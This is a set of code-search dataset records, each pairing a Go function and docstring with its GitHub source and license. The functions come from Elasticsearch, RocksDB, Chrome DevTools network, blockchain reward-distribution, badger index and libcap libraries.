"index": strings.Join(s.index, ","),
"name": strings.Join(s.name, ","),
})
} else if len(s.index) > 0 && len(s.typ) > 0 && len(s.name) == 0 {
path, err = uritemplates.Expand("/{index}/{type}/_warmer", map[string]string{
"index": strings.Join(s.index, ","),
"type": strings.Join(s.typ, ","),
})
} else if len(s.index) > 0 && len(s.typ) > 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/{index}/{type}/_warmer/{name}", map[string]string{
"index": strings.Join(s.index, ","),
"type": strings.Join(s.typ, ","),
"name": strings.Join(s.name, ","),
})
}
if err != nil {
return "", url.Values{}, err
}
params := url.Values{}
if s.pretty {
params.Set("pretty", "1")
}
if s.allowNoIndices != nil {
params.Set("allow_no_indices", fmt.Sprintf("%v", *s.allowNoIndices))
}
if s.expandWildcards != "" {
params.Set("expand_wildcards", s.expandWildcards)
}
if s.ignoreUnavailable != nil {
params.Set("ignore_unavailable", fmt.Sprintf("%v", *s.ignoreUnavailable))
}
if s.local != nil {
params.Set("local", fmt.Sprintf("%v", *s.local))
}
return path, params, nil
} | buildURL builds the URL for the operation. | https://github.com/grimmer0125/search-github-starred/blob/e0a11162ad6f63d93df3898fd32295f7c9d3faa4/vendor/github.com/grimmer0125/elastic/indices_get_warmer.go#L99-L161 | package elastic
import (
"fmt"
"net/url"
"strings"
"gopkg.in/olivere/elastic.v3/uritemplates"
)
type IndicesGetWarmerService struct {
client *Client
pretty bool
index []string
name []string
typ []string
allowNoIndices *bool
expandWildcards string
ignoreUnavailable *bool
local *bool
}
func NewIndicesGetWarmerService(client *Client) *IndicesGetWarmerService {
return &IndicesGetWarmerService{
client: client,
typ: make([]string, 0),
index: make([]string, 0),
name: make([]string, 0),
}
}
func (s *IndicesGetWarmerService) Index(indices ...string) *IndicesGetWarmerService {
s.index = append(s.index, indices...)
return s
}
func (s *IndicesGetWarmerService) Name(name ...string) *IndicesGetWarmerService {
s.name = append(s.name, name...)
return s
}
func (s *IndicesGetWarmerService) Type(typ ...string) *IndicesGetWarmerService {
s.typ = append(s.typ, typ...)
return s
}
func (s *IndicesGetWarmerService) AllowNoIndices(allowNoIndices bool) *IndicesGetWarmerService {
s.allowNoIndices = &allowNoIndices
return s
}
func (s *IndicesGetWarmerService) ExpandWildcards(expandWildcards string) *IndicesGetWarmerService {
s.expandWildcards = expandWildcards
return s
}
func (s *IndicesGetWarmerService) IgnoreUnavailable(ignoreUnavailable bool) *IndicesGetWarmerService {
s.ignoreUnavailable = &ignoreUnavailable
return s
}
func (s *IndicesGetWarmerService) Local(local bool) *IndicesGetWarmerService {
s.local = &local
return s
}
func (s *IndicesGetWarmerService) Pretty(pretty bool) *IndicesGetWarmerService {
s.pretty = pretty
return s
} | MIT License |
sfproductlabs/dcrontab | dcrontab/gorocksdb/options_read.go | Destroy | go | func (opts *ReadOptions) Destroy() {
C.rocksdb_readoptions_destroy(opts.c)
opts.c = nil
} | Destroy deallocates the ReadOptions object. | https://github.com/sfproductlabs/dcrontab/blob/4cece40aa4d35858a142d8ec5f2c89553fc9c519/dcrontab/gorocksdb/options_read.go#L122-L125 | package gorocksdb
import "C"
import "unsafe"
type ReadTier uint
const (
ReadAllTier = ReadTier(0)
BlockCacheTier = ReadTier(1)
)
type ReadOptions struct {
c *C.rocksdb_readoptions_t
}
func NewDefaultReadOptions() *ReadOptions {
return NewNativeReadOptions(C.rocksdb_readoptions_create())
}
func NewNativeReadOptions(c *C.rocksdb_readoptions_t) *ReadOptions {
return &ReadOptions{c}
}
func (opts *ReadOptions) UnsafeGetReadOptions() unsafe.Pointer {
return unsafe.Pointer(opts.c)
}
func (opts *ReadOptions) SetVerifyChecksums(value bool) {
C.rocksdb_readoptions_set_verify_checksums(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetFillCache(value bool) {
C.rocksdb_readoptions_set_fill_cache(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetSnapshot(snap *Snapshot) {
C.rocksdb_readoptions_set_snapshot(opts.c, snap.c)
}
func (opts *ReadOptions) SetReadTier(value ReadTier) {
C.rocksdb_readoptions_set_read_tier(opts.c, C.int(value))
}
func (opts *ReadOptions) SetTailing(value bool) {
C.rocksdb_readoptions_set_tailing(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetIterateUpperBound(key []byte) {
cKey := byteToChar(key)
cKeyLen := C.size_t(len(key))
C.rocksdb_readoptions_set_iterate_upper_bound(opts.c, cKey, cKeyLen)
}
func (opts *ReadOptions) SetPinData(value bool) {
C.rocksdb_readoptions_set_pin_data(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetReadaheadSize(value uint64) {
C.rocksdb_readoptions_set_readahead_size(opts.c, C.size_t(value))
} | Apache License 2.0 |
wirepair/autogcd | vendor/github.com/wirepair/gcd/gcdapi/network.go | DeleteCookies | go | func (c *Network) DeleteCookies(name string, url string, domain string, path string) (*gcdmessage.ChromeResponse, error) {
var v NetworkDeleteCookiesParams
v.Name = name
v.Url = url
v.Domain = domain
v.Path = path
return c.DeleteCookiesWithParams(&v)
} | DeleteCookies - Deletes browser cookies with matching name and url or domain/path pair.
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path. | https://github.com/wirepair/autogcd/blob/80392884ea9402ba4b8ecb1eccf361611b171df8/vendor/github.com/wirepair/gcd/gcdapi/network.go#L597-L604 | package gcdapi
import (
"encoding/json"
"github.com/wirepair/gcd/gcdmessage"
)
type NetworkResourceTiming struct {
RequestTime float64 `json:"requestTime"`
ProxyStart float64 `json:"proxyStart"`
ProxyEnd float64 `json:"proxyEnd"`
DnsStart float64 `json:"dnsStart"`
DnsEnd float64 `json:"dnsEnd"`
ConnectStart float64 `json:"connectStart"`
ConnectEnd float64 `json:"connectEnd"`
SslStart float64 `json:"sslStart"`
SslEnd float64 `json:"sslEnd"`
WorkerStart float64 `json:"workerStart"`
WorkerReady float64 `json:"workerReady"`
SendStart float64 `json:"sendStart"`
SendEnd float64 `json:"sendEnd"`
PushStart float64 `json:"pushStart"`
PushEnd float64 `json:"pushEnd"`
ReceiveHeadersEnd float64 `json:"receiveHeadersEnd"`
}
type NetworkRequest struct {
Url string `json:"url"`
UrlFragment string `json:"urlFragment,omitempty"`
Method string `json:"method"`
Headers map[string]interface{} `json:"headers"`
PostData string `json:"postData,omitempty"`
HasPostData bool `json:"hasPostData,omitempty"`
MixedContentType string `json:"mixedContentType,omitempty"`
InitialPriority string `json:"initialPriority"`
ReferrerPolicy string `json:"referrerPolicy"`
IsLinkPreload bool `json:"isLinkPreload,omitempty"`
}
type NetworkSignedCertificateTimestamp struct {
Status string `json:"status"`
Origin string `json:"origin"`
LogDescription string `json:"logDescription"`
LogId string `json:"logId"`
Timestamp float64 `json:"timestamp"`
HashAlgorithm string `json:"hashAlgorithm"`
SignatureAlgorithm string `json:"signatureAlgorithm"`
SignatureData string `json:"signatureData"`
}
type NetworkSecurityDetails struct {
Protocol string `json:"protocol"`
KeyExchange string `json:"keyExchange"`
KeyExchangeGroup string `json:"keyExchangeGroup,omitempty"`
Cipher string `json:"cipher"`
Mac string `json:"mac,omitempty"`
CertificateId int `json:"certificateId"`
SubjectName string `json:"subjectName"`
SanList []string `json:"sanList"`
Issuer string `json:"issuer"`
ValidFrom float64 `json:"validFrom"`
ValidTo float64 `json:"validTo"`
SignedCertificateTimestampList []*NetworkSignedCertificateTimestamp `json:"signedCertificateTimestampList"`
CertificateTransparencyCompliance string `json:"certificateTransparencyCompliance"`
}
type NetworkResponse struct {
Url string `json:"url"`
Status int `json:"status"`
StatusText string `json:"statusText"`
Headers map[string]interface{} `json:"headers"`
HeadersText string `json:"headersText,omitempty"`
MimeType string `json:"mimeType"`
RequestHeaders map[string]interface{} `json:"requestHeaders,omitempty"`
RequestHeadersText string `json:"requestHeadersText,omitempty"`
ConnectionReused bool `json:"connectionReused"`
ConnectionId float64 `json:"connectionId"`
RemoteIPAddress string `json:"remoteIPAddress,omitempty"`
RemotePort int `json:"remotePort,omitempty"`
FromDiskCache bool `json:"fromDiskCache,omitempty"`
FromServiceWorker bool `json:"fromServiceWorker,omitempty"`
EncodedDataLength float64 `json:"encodedDataLength"`
Timing *NetworkResourceTiming `json:"timing,omitempty"`
Protocol string `json:"protocol,omitempty"`
SecurityState string `json:"securityState"`
SecurityDetails *NetworkSecurityDetails `json:"securityDetails,omitempty"`
}
type NetworkWebSocketRequest struct {
Headers map[string]interface{} `json:"headers"`
}
type NetworkWebSocketResponse struct {
Status int `json:"status"`
StatusText string `json:"statusText"`
Headers map[string]interface{} `json:"headers"`
HeadersText string `json:"headersText,omitempty"`
RequestHeaders map[string]interface{} `json:"requestHeaders,omitempty"`
RequestHeadersText string `json:"requestHeadersText,omitempty"`
}
type NetworkWebSocketFrame struct {
Opcode float64 `json:"opcode"`
Mask bool `json:"mask"`
PayloadData string `json:"payloadData"`
}
type NetworkCachedResource struct {
Url string `json:"url"`
Type string `json:"type"`
Response *NetworkResponse `json:"response,omitempty"`
BodySize float64 `json:"bodySize"`
}
type NetworkInitiator struct {
Type string `json:"type"`
Stack *RuntimeStackTrace `json:"stack,omitempty"`
Url string `json:"url,omitempty"`
LineNumber float64 `json:"lineNumber,omitempty"`
}
type NetworkCookie struct {
Name string `json:"name"`
Value string `json:"value"`
Domain string `json:"domain"`
Path string `json:"path"`
Expires float64 `json:"expires"`
Size int `json:"size"`
HttpOnly bool `json:"httpOnly"`
Secure bool `json:"secure"`
Session bool `json:"session"`
SameSite string `json:"sameSite,omitempty"`
}
type NetworkCookieParam struct {
Name string `json:"name"`
Value string `json:"value"`
Url string `json:"url,omitempty"`
Domain string `json:"domain,omitempty"`
Path string `json:"path,omitempty"`
Secure bool `json:"secure,omitempty"`
HttpOnly bool `json:"httpOnly,omitempty"`
SameSite string `json:"sameSite,omitempty"`
Expires float64 `json:"expires,omitempty"`
}
type NetworkAuthChallenge struct {
Source string `json:"source,omitempty"`
Origin string `json:"origin"`
Scheme string `json:"scheme"`
Realm string `json:"realm"`
}
type NetworkAuthChallengeResponse struct {
Response string `json:"response"`
Username string `json:"username,omitempty"`
Password string `json:"password,omitempty"`
}
type NetworkRequestPattern struct {
UrlPattern string `json:"urlPattern,omitempty"`
ResourceType string `json:"resourceType,omitempty"`
InterceptionStage string `json:"interceptionStage,omitempty"`
}
type NetworkSignedExchangeSignature struct {
Label string `json:"label"`
Signature string `json:"signature"`
Integrity string `json:"integrity"`
CertUrl string `json:"certUrl,omitempty"`
CertSha256 string `json:"certSha256,omitempty"`
ValidityUrl string `json:"validityUrl"`
Date int `json:"date"`
Expires int `json:"expires"`
Certificates []string `json:"certificates,omitempty"`
}
type NetworkSignedExchangeHeader struct {
RequestUrl string `json:"requestUrl"`
RequestMethod string `json:"requestMethod"`
ResponseCode int `json:"responseCode"`
ResponseHeaders map[string]interface{} `json:"responseHeaders"`
Signatures []*NetworkSignedExchangeSignature `json:"signatures"`
}
type NetworkSignedExchangeError struct {
Message string `json:"message"`
SignatureIndex int `json:"signatureIndex,omitempty"`
ErrorField string `json:"errorField,omitempty"`
}
type NetworkSignedExchangeInfo struct {
OuterResponse *NetworkResponse `json:"outerResponse"`
Header *NetworkSignedExchangeHeader `json:"header,omitempty"`
SecurityDetails *NetworkSecurityDetails `json:"securityDetails,omitempty"`
Errors []*NetworkSignedExchangeError `json:"errors,omitempty"`
}
type NetworkDataReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
DataLength int `json:"dataLength"`
EncodedDataLength int `json:"encodedDataLength"`
} `json:"Params,omitempty"`
}
type NetworkEventSourceMessageReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
EventName string `json:"eventName"`
EventId string `json:"eventId"`
Data string `json:"data"`
} `json:"Params,omitempty"`
}
type NetworkLoadingFailedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Type string `json:"type"`
ErrorText string `json:"errorText"`
Canceled bool `json:"canceled,omitempty"`
BlockedReason string `json:"blockedReason,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkLoadingFinishedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
EncodedDataLength float64 `json:"encodedDataLength"`
ShouldReportCorbBlocking bool `json:"shouldReportCorbBlocking,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkRequestInterceptedEvent struct {
Method string `json:"method"`
Params struct {
InterceptionId string `json:"interceptionId"`
Request *NetworkRequest `json:"request"`
FrameId string `json:"frameId"`
ResourceType string `json:"resourceType"`
IsNavigationRequest bool `json:"isNavigationRequest"`
IsDownload bool `json:"isDownload,omitempty"`
RedirectUrl string `json:"redirectUrl,omitempty"`
AuthChallenge *NetworkAuthChallenge `json:"authChallenge,omitempty"`
ResponseErrorReason string `json:"responseErrorReason,omitempty"`
ResponseStatusCode int `json:"responseStatusCode,omitempty"`
ResponseHeaders map[string]interface{} `json:"responseHeaders,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkRequestServedFromCacheEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
} `json:"Params,omitempty"`
}
type NetworkRequestWillBeSentEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
LoaderId string `json:"loaderId"`
DocumentURL string `json:"documentURL"`
Request *NetworkRequest `json:"request"`
Timestamp float64 `json:"timestamp"`
WallTime float64 `json:"wallTime"`
Initiator *NetworkInitiator `json:"initiator"`
RedirectResponse *NetworkResponse `json:"redirectResponse,omitempty"`
Type string `json:"type,omitempty"`
FrameId string `json:"frameId,omitempty"`
HasUserGesture bool `json:"hasUserGesture,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkResourceChangedPriorityEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
NewPriority string `json:"newPriority"`
Timestamp float64 `json:"timestamp"`
} `json:"Params,omitempty"`
}
type NetworkSignedExchangeReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Info *NetworkSignedExchangeInfo `json:"info"`
} `json:"Params,omitempty"`
}
type NetworkResponseReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
LoaderId string `json:"loaderId"`
Timestamp float64 `json:"timestamp"`
Type string `json:"type"`
Response *NetworkResponse `json:"response"`
FrameId string `json:"frameId,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketClosedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketCreatedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Url string `json:"url"`
Initiator *NetworkInitiator `json:"initiator,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketFrameErrorEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
ErrorMessage string `json:"errorMessage"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketFrameReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Response *NetworkWebSocketFrame `json:"response"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketFrameSentEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Response *NetworkWebSocketFrame `json:"response"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketHandshakeResponseReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Response *NetworkWebSocketResponse `json:"response"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketWillSendHandshakeRequestEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
WallTime float64 `json:"wallTime"`
Request *NetworkWebSocketRequest `json:"request"`
} `json:"Params,omitempty"`
}
type Network struct {
target gcdmessage.ChromeTargeter
}
func NewNetwork(target gcdmessage.ChromeTargeter) *Network {
c := &Network{target: target}
return c
}
func (c *Network) CanClearBrowserCache() (bool, error) {
resp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.canClearBrowserCache"})
if err != nil {
return false, err
}
var chromeData struct {
Result struct {
Result bool
}
}
if resp == nil {
return false, &gcdmessage.ChromeEmptyResponseErr{}
}
cerr := &gcdmessage.ChromeErrorResponse{}
json.Unmarshal(resp.Data, cerr)
if cerr != nil && cerr.Error != nil {
return false, &gcdmessage.ChromeRequestErr{Resp: cerr}
}
if err := json.Unmarshal(resp.Data, &chromeData); err != nil {
return false, err
}
return chromeData.Result.Result, nil
}
func (c *Network) CanClearBrowserCookies() (bool, error) {
resp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.canClearBrowserCookies"})
if err != nil {
return false, err
}
var chromeData struct {
Result struct {
Result bool
}
}
if resp == nil {
return false, &gcdmessage.ChromeEmptyResponseErr{}
}
cerr := &gcdmessage.ChromeErrorResponse{}
json.Unmarshal(resp.Data, cerr)
if cerr != nil && cerr.Error != nil {
return false, &gcdmessage.ChromeRequestErr{Resp: cerr}
}
if err := json.Unmarshal(resp.Data, &chromeData); err != nil {
return false, err
}
return chromeData.Result.Result, nil
}
func (c *Network) CanEmulateNetworkConditions() (bool, error) {
resp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.canEmulateNetworkConditions"})
if err != nil {
return false, err
}
var chromeData struct {
Result struct {
Result bool
}
}
if resp == nil {
return false, &gcdmessage.ChromeEmptyResponseErr{}
}
cerr := &gcdmessage.ChromeErrorResponse{}
json.Unmarshal(resp.Data, cerr)
if cerr != nil && cerr.Error != nil {
return false, &gcdmessage.ChromeRequestErr{Resp: cerr}
}
if err := json.Unmarshal(resp.Data, &chromeData); err != nil {
return false, err
}
return chromeData.Result.Result, nil
}
func (c *Network) ClearBrowserCache() (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.clearBrowserCache"})
}
func (c *Network) ClearBrowserCookies() (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.clearBrowserCookies"})
}
type NetworkContinueInterceptedRequestParams struct {
InterceptionId string `json:"interceptionId"`
ErrorReason string `json:"errorReason,omitempty"`
RawResponse string `json:"rawResponse,omitempty"`
Url string `json:"url,omitempty"`
Method string `json:"method,omitempty"`
PostData string `json:"postData,omitempty"`
Headers map[string]interface{} `json:"headers,omitempty"`
AuthChallengeResponse *NetworkAuthChallengeResponse `json:"authChallengeResponse,omitempty"`
}
func (c *Network) ContinueInterceptedRequestWithParams(v *NetworkContinueInterceptedRequestParams) (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.continueInterceptedRequest", Params: v})
}
func (c *Network) ContinueInterceptedRequest(interceptionId string, errorReason string, rawResponse string, url string, method string, postData string, headers map[string]interface{}, authChallengeResponse *NetworkAuthChallengeResponse) (*gcdmessage.ChromeResponse, error) {
var v NetworkContinueInterceptedRequestParams
v.InterceptionId = interceptionId
v.ErrorReason = errorReason
v.RawResponse = rawResponse
v.Url = url
v.Method = method
v.PostData = postData
v.Headers = headers
v.AuthChallengeResponse = authChallengeResponse
return c.ContinueInterceptedRequestWithParams(&v)
}
type NetworkDeleteCookiesParams struct {
Name string `json:"name"`
Url string `json:"url,omitempty"`
Domain string `json:"domain,omitempty"`
Path string `json:"path,omitempty"`
}
func (c *Network) DeleteCookiesWithParams(v *NetworkDeleteCookiesParams) (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.deleteCookies", Params: v})
} | MIT License |
loccs/mss | ots/winternitz/prkg.go | Init | go | func (prkg *KeyIterator) Init(compositeSeed []byte) bool {
buf := bytes.NewBuffer(compositeSeed)
var fieldLen uint8
if err := binary.Read(buf, binary.BigEndian,
&fieldLen); (nil != err) && (0 == fieldLen) {
return false
}
compactSeed := make([]byte, fieldLen)
if err := binary.Read(buf, binary.BigEndian,
compactSeed); nil != err {
return false
}
prkg.rng = rand.New(compactSeed)
if nil == prkg.WtnOpts {
prkg.WtnOpts = NewWtnOpts(SecurityLevel)
}
var offset uint32
if err := binary.Read(buf, binary.BigEndian,
&offset); nil != err {
return false
}
prkg.offset = offset
prkg.SetKeyIdx(prkg.offset)
fieldLen = 0
if err := binary.Read(buf, binary.BigEndian,
&fieldLen); (nil != err) && (0 == fieldLen) {
return false
}
nonce := make([]byte, fieldLen)
if err := binary.Read(buf, binary.BigEndian,
nonce); io.ErrUnexpectedEOF == err {
return false
}
prkg.WtnOpts.SetNonce(nonce)
return true
} | Init initialises the prkgator with the composite seed
exported by Serialize() | https://github.com/loccs/mss/blob/f05ec83eac58e4e9a45aa7674b7c533c112980ba/ots/winternitz/prkg.go#L36-L85 | package winternitz
import (
"bytes"
"encoding/binary"
"io"
"github.com/LoCCS/mss/rand"
)
type KeyIterator struct {
rng *rand.Rand
offset uint32
*WtnOpts
}
func NewKeyIterator(compactSeed []byte) *KeyIterator {
prkg := new(KeyIterator)
prkg.rng = rand.New(compactSeed)
prkg.offset = 0
prkg.WtnOpts = NewWtnOpts(SecurityLevel)
return prkg
} | MIT License |
dipper-labs/dipper-protocol | app/v0/distribution/keeper/allocation.go | AllocateTokensToValidator | go | func (k Keeper) AllocateTokensToValidator(ctx sdk.Context, val exported.ValidatorI, tokens sdk.DecCoins) {
commission := tokens.MulDec(val.GetCommission())
shared := tokens.Sub(commission)
ctx.EventManager().EmitEvent(
sdk.NewEvent(
types.EventTypeCommission,
sdk.NewAttribute(sdk.AttributeKeyAmount, commission.String()),
sdk.NewAttribute(types.AttributeKeyValidator, val.GetOperator().String()),
),
)
currentCommission := k.GetValidatorAccumulatedCommission(ctx, val.GetOperator())
currentCommission = currentCommission.Add(commission)
k.SetValidatorAccumulatedCommission(ctx, val.GetOperator(), currentCommission)
currentRewards := k.GetValidatorCurrentRewards(ctx, val.GetOperator())
currentRewards.Rewards = currentRewards.Rewards.Add(shared)
k.SetValidatorCurrentRewards(ctx, val.GetOperator(), currentRewards)
ctx.EventManager().EmitEvent(
sdk.NewEvent(
types.EventTypeRewards,
sdk.NewAttribute(sdk.AttributeKeyAmount, tokens.String()),
sdk.NewAttribute(types.AttributeKeyValidator, val.GetOperator().String()),
),
)
outstanding := k.GetValidatorOutstandingRewards(ctx, val.GetOperator())
outstanding = outstanding.Add(tokens)
k.SetValidatorOutstandingRewards(ctx, val.GetOperator(), outstanding)
} | AllocateTokensToValidator allocates tokens to a particular validator, splitting according to commission | https://github.com/dipper-labs/dipper-protocol/blob/94dd33dd64dee9971092c42352fe8d455e8458de/app/v0/distribution/keeper/allocation.go#L100-L133 | package keeper
import (
"fmt"
abci "github.com/tendermint/tendermint/abci/types"
"github.com/Dipper-Labs/Dipper-Protocol/app/v0/distribution/types"
"github.com/Dipper-Labs/Dipper-Protocol/app/v0/staking/exported"
sdk "github.com/Dipper-Labs/Dipper-Protocol/types"
)
func (k Keeper) AllocateTokens(
ctx sdk.Context, sumPreviousPrecommitPower, totalPreviousPower int64,
previousProposer sdk.ConsAddress, previousVotes []abci.VoteInfo,
) {
logger := k.Logger(ctx)
feeCollector := k.supplyKeeper.GetModuleAccount(ctx, k.feeCollectorName)
feesCollectedInt := feeCollector.GetCoins()
feesCollected := sdk.NewDecCoins(feesCollectedInt)
err := k.supplyKeeper.SendCoinsFromModuleToModule(ctx, k.feeCollectorName, types.ModuleName, feesCollectedInt)
if err != nil {
panic(err)
}
feePool := k.GetFeePool(ctx)
if totalPreviousPower == 0 {
feePool.CommunityPool = feePool.CommunityPool.Add(feesCollected)
k.SetFeePool(ctx, feePool)
return
}
previousFractionVotes := sdk.NewDec(sumPreviousPrecommitPower).Quo(sdk.NewDec(totalPreviousPower))
baseProposerReward := k.GetBaseProposerReward(ctx)
bonusProposerReward := k.GetBonusProposerReward(ctx)
proposerMultiplier := baseProposerReward.Add(bonusProposerReward.MulTruncate(previousFractionVotes))
proposerReward := feesCollected.MulDecTruncate(proposerMultiplier)
remaining := feesCollected
proposerValidator := k.stakingKeeper.ValidatorByConsAddr(ctx, previousProposer)
if proposerValidator != nil {
ctx.EventManager().EmitEvent(
sdk.NewEvent(
types.EventTypeProposerReward,
sdk.NewAttribute(sdk.AttributeKeyAmount, proposerReward.String()),
sdk.NewAttribute(types.AttributeKeyValidator, proposerValidator.GetOperator().String()),
),
)
k.AllocateTokensToValidator(ctx, proposerValidator, proposerReward)
remaining = remaining.Sub(proposerReward)
} else {
logger.Error(fmt.Sprintf(
"WARNING: Attempt to allocate proposer rewards to unknown proposer %s. "+
"This should happen only if the proposer unbonded completely within a single block, "+
"which generally should not happen except in exceptional circumstances (or fuzz testing). "+
"We recommend you investigate immediately.",
previousProposer.String()))
}
communityTax := k.GetCommunityTax(ctx)
voteMultiplier := sdk.OneDec().Sub(proposerMultiplier).Sub(communityTax)
for _, vote := range previousVotes {
validator := k.stakingKeeper.ValidatorByConsAddr(ctx, vote.Validator.Address)
powerFraction := sdk.NewDec(vote.Validator.Power).QuoTruncate(sdk.NewDec(totalPreviousPower))
reward := feesCollected.MulDecTruncate(voteMultiplier).MulDecTruncate(powerFraction)
k.AllocateTokensToValidator(ctx, validator, reward)
remaining = remaining.Sub(reward)
}
feePool.CommunityPool = feePool.CommunityPool.Add(remaining)
k.SetFeePool(ctx, feePool)
} | Apache License 2.0 |
mayocream/pastebin-ipfs | pkg/index/index.go | FilterFileCid | go | func (i *Index) FilterFileCid(limit int) (ids []string, err error) {
err = i.db.Update(func(txn *badger.Txn) error {
opts := badger.DefaultIteratorOptions
opts.Reverse = true
it := txn.NewIterator(opts)
defer it.Close()
var i int
for it.Rewind(); it.Valid(); it.Next() {
if !bytes.HasPrefix(it.Item().Key(), []byte(recentPrefix)) {
continue
}
i++
if i > limit {
if err := txn.Delete(it.Item().Key()); err != nil {
return err
}
continue
}
v, _ := it.Item().ValueCopy(nil)
ids = append(ids, string(v))
}
return nil
})
return
} | FIXME: not working... | https://github.com/mayocream/pastebin-ipfs/blob/216d5c496434348eecc44577506b37bcc91347d7/pkg/index/index.go#L77-L104 | package index
import (
"bytes"
"errors"
"time"
"github.com/dgraph-io/badger/v3"
"github.com/spf13/cast"
"go.uber.org/atomic"
)
var atom atomic.Uint32
type Index struct {
db *badger.DB
}
type ObjectType int
const (
ObjectTypeFile ObjectType = iota + 1
ObjectTypeDir
ObjectTypeMeta
)
const (
existPrefix = "_cid"
recentPrefix = "_recent"
)
func NewIndex(path string) (*Index, error) {
db, err := badger.Open(badger.DefaultOptions(path))
if err != nil {
return nil, err
}
idx := &Index{
db: db,
}
return idx, nil
}
func (i *Index) SetExist(cid string, ot ObjectType) error {
return i.db.Update(func(txn *badger.Txn) error {
if ot == ObjectTypeDir {
sortStr := cast.ToString(time.Now().UnixNano())
sortStr += cast.ToString(atom.Add(1))
txn.Set([]byte(recentPrefix+sortStr), []byte(cid))
}
return txn.Set([]byte(existPrefix+cid), []byte(cast.ToString(ot)))
})
}
func (i *Index) Exist(cid string) (ok bool, err error) {
i.db.View(func(txn *badger.Txn) error {
_, err := txn.Get([]byte(existPrefix + cid))
if err == nil {
ok = true
return nil
}
if errors.Is(err, badger.ErrKeyNotFound) {
return nil
}
return err
})
return
} | MIT License |
kayrus/gof5 | vendor/kernel.org/pub/linux/libs/security/libcap/cap/iab.go | IABFromText | go | func IABFromText(text string) (*IAB, error) {
iab := IABInit()
if len(text) == 0 {
return iab, nil
}
for _, f := range strings.Split(text, ",") {
var i, a, nb bool
var j int
for j = 0; j < len(f); j++ {
switch f[j : j+1] {
case "!":
nb = true
case "^":
i = true
a = true
case "%":
i = true
default:
goto done
}
}
done:
c, err := FromName(f[j:])
if err != nil {
return nil, err
}
offset, mask := omask(c)
if i || !nb {
iab.i[offset] |= mask
}
if a {
iab.a[offset] |= mask
}
if nb {
iab.nb[offset] |= mask
}
}
return iab, nil
} | IABFromText parses a string representing an IAB, as generated
by IAB.String(), to generate an IAB. | https://github.com/kayrus/gof5/blob/bbbfa3b65046bb6be028936863c7d3e1a9ad164c/vendor/kernel.org/pub/linux/libs/security/libcap/cap/iab.go#L80-L118 | package cap
import "strings"
func omask(c Value) (uint, uint32) {
u := uint(c)
return u >> 5, uint32(1) << (u & 31)
}
type IAB struct {
a, i, nb []uint32
}
type Vector uint
const (
Inh Vector = iota
Amb
Bound
)
func (v Vector) String() string {
switch v {
case Inh:
return "I"
case Amb:
return "A"
case Bound:
return "B"
default:
return "<Error>"
}
}
func IABInit() *IAB {
startUp.Do(multisc.cInit)
return &IAB{
i: make([]uint32, words),
a: make([]uint32, words),
nb: make([]uint32, words),
}
}
func IABGetProc() *IAB {
iab := IABInit()
current := GetProc()
iab.Fill(Inh, current, Inheritable)
for c := MaxBits(); c > 0; {
c--
offset, mask := omask(c)
if a, _ := GetAmbient(c); a {
iab.a[offset] |= mask
}
